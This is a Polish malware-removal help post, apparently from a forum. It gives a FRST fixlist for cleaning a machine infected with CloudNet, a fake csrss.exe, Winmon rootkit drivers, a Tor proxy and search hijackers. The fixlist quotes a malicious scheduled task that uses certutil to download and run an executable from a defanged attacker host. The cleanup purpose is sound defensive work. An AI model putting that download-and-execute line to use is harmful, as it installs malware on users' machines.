W trybie awaryjnym odinstaluj CloudNet.Otwórz notatnik systemowy i wklej: CloseProcesses: Task: {099CB0A1-5F8D-433F-9D13-8C9C20E2A3C1} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\1\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\1\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA Task: {79399915-A605-4616-B5EF-6DCA6FF42F2D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-05] () <==== UWAGA Task: {BB56134F-EDEA-4F4C-AE37-BE564F9BF9B2} - \uxjyr -> Brak pliku <==== UWAGA Task: {DE006AF9-0FD2-47B3-9E08-ACEFF3B3E01B} - System32\Tasks\{C9D64427-0B8B-4203-8B0A-C07923397C91} => C:\Windows\system32\pcalua.exe -a D:\Setup.exe -d D:\ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\Run: [BrokenDarkness] => C:\Windows\rss\csrss.exe [3047424 2018-06-05] () <==== UWAGA HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\Run: [CloudNet] => C:\Users\1\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-05] (EpicNet Inc.) <==== UWAGA HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\...\MountPoints2: {3762f577-8a37-11e7-a804-4ccc6a2bfc3f} - F:\HiSuiteDownLoader.exe GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-3800236265-2849643086-1748996452-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ7mRpjVF4fT4KBExoHyct6E2cT1snesK3xZl6yMY9wbOyytcna6ZW-fc6N8UgrfNkFriAjrzPOJfRlcuJ0JGlNwUhbVJn9S7WBs1OMeEtuBW7BlD7pKAnryujMDM4GukLwxqZ_Q8PdC0MsdD1x5t4buBHkyA,,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-05-20] [Brak podpisu cyfrowego] CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms} CHR DefaultSearchKeyword: Default -> Bazz Search CHR Extension: (Bazz Search) - C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-20] CHR Extension: (Brak nazwy) - C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\Extensions\odcmcehfddfnnnbaifjhkikddagchieg [2018-05-20] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] R2 TCPSvc; "C:\Users\1\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\1\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\1\AppData\Local\Temp\csrss\proxy\t" <==== UWAGA R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-05] () [Brak podpisu cyfrowego] <==== UWAGA S3 MSICDSetup; \??\D:\CDriver64.sys [X] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] S4 NVHDA; system32\drivers\nvhda64v.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] S4 nvvhci; system32\DRIVERS\nvvhci.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] 2018-06-05 08:54 - 2018-06-05 08:54 - 000000000 ____D C:\Users\1\AppData\Roaming\EpicNet Inc 2018-05-20 10:27 - 2018-05-20 10:27 - 007611392 _____ () C:\Users\1\AppData\Local\agent.dat 2018-05-20 10:27 - 2018-05-20 10:27 - 001895381 _____ () C:\Users\1\AppData\Local\Airfax.bin 2018-05-20 10:27 - 2018-05-20 10:27 - 000070896 _____ () C:\Users\1\AppData\Local\Config.xml 2018-05-20 10:27 - 2018-05-20 10:27 - 000140800 _____ () C:\Users\1\AppData\Local\installer.dat 2018-05-20 10:27 - 2018-05-20 10:27 - 000005568 _____ () C:\Users\1\AppData\Local\md.xml 2018-05-20 10:27 - 2018-05-20 10:27 - 000126464 _____ () C:\Users\1\AppData\Local\noah.dat 2018-05-20 10:27 - 2018-05-20 10:35 - 000929792 _____ () C:\Users\1\AppData\Local\sham.db 2018-05-20 10:27 - 2018-05-20 10:27 - 002136576 _____ (TODO: ) C:\Users\1\AppData\Local\Sontop.exe 2018-05-20 10:27 - 2018-05-20 10:27 - 000278511 _____ () C:\Users\1\AppData\Local\Sontop.tst 2018-05-20 10:27 - 2018-05-20 10:27 - 002136576 _____ (TODO: ) C:\Users\1\AppData\Local\Tontip.exe 2018-05-20 10:27 - 2018-05-20 10:27 - 001987160 _____ () C:\Users\1\AppData\Local\Tontip.tst 2018-05-20 10:27 - 2018-05-20 10:27 - 000032038 _____ () C:\Users\1\AppData\Local\uninstall_temp.ico C:\Windows\rss\csrss.exe C:\Users\1\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pokaż nowe logi z FRST.